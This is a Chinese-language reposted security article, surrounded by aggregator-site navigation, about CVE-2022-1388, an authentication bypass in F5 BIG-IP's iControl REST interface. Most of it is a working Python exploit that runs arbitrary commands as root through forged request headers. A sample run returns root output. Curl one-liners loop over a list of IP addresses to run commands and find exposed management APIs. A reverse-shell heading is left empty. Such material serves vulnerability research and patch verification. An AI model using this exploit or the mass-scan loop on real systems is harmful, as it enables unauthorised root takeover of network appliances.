IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> CVE-2022-1388:F5 BIG-IP远程命令执行 -> 正文阅读

[网络协议]CVE-2022-1388:F5 BIG-IP远程命令执行

参考文章:

F5 BIG-IP(CVE-2022-1388) RCE

GitHub - horizon3ai/CVE-2022-1388: POC for CVE-2022-1388

1、漏洞描述

F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。iControl REST 是iControl 框架的演变,使用 REpresentational State Transfer (REST)。这允许用户或脚本与 F5 设备之间进行轻量级、快速的交互。

2、风险等级

3、漏洞详情

CVE: CVE-2022-1388

组件: F5 BIG-IP iControl REST

漏洞类型: 身份验证绕过

影响: 命令执行

简述: 该漏洞允许未经身份验证的攻击者通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问,以执行任意系统命令、创建或删除文件以及禁用BIG-IP上的服务。

4、漏洞检测方法一

参考文章:GitHub - horizon3ai/CVE-2022-1388: POC for CVE-2022-1388

#!/usr/bin/python3
import argparse
import requests
import urllib3
urllib3.disable_warnings()

def exploit(target, command):
? ? url = f'https://{target}/mgmt/tm/util/bash'
? ? headers = {
? ? ? ? 'Host': '127.0.0.1',
? ? ? ? 'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',
? ? ? ? 'X-F5-Auth-Token': 'asdf', ? ? ? ?
? ? ? ? 'Connection': 'X-F5-Auth-Token',
? ? ? ? 'Content-Type': 'application/json'
? ? ? ? ? ?
? ? }
? ? j = {"command":"run","utilCmdArgs":"-c '{0}'".format(command)}
? ? r = requests.post(url, headers=headers, json=j, verify=False)
? ? r.raise_for_status()
? ? if ( r.status_code != 204 and r.headers["content-type"].strip().startswith("application/json")):
? ? ? ? print(r.json()['commandResult'].strip())
? ? else:
? ? ? ? print("Response is empty! Target does not seems to be vulnerable..")

if __name__ == "__main__":
? ? parser = argparse.ArgumentParser()
? ? parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
? ? parser.add_argument('-c', '--command', help='The command to execute')
? ? args = parser.parse_args()

? ? exploit(args.target, args.command)?

4、脚本使用方法

下载脚本,然后执行命令如下所示:

root@kali:/home/dev# python3 CVE-2022-1388.py -t 192.168.0.221 -c id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

5、漏洞检测方法二:

检测命令如下:

cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done

cat ips.txt | while read host do; do curl -sk "https://$host/mgmt/shared/authn/login" | grep -q 'resterrorresponse' && printf "$host \0331;41mF5 iControl REST API Exposed\e[0m\n"; done

反弹shell操作:

?

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-05-15 11:44:47  更:2022-05-15 11:44:59 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/26 0:33:09-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码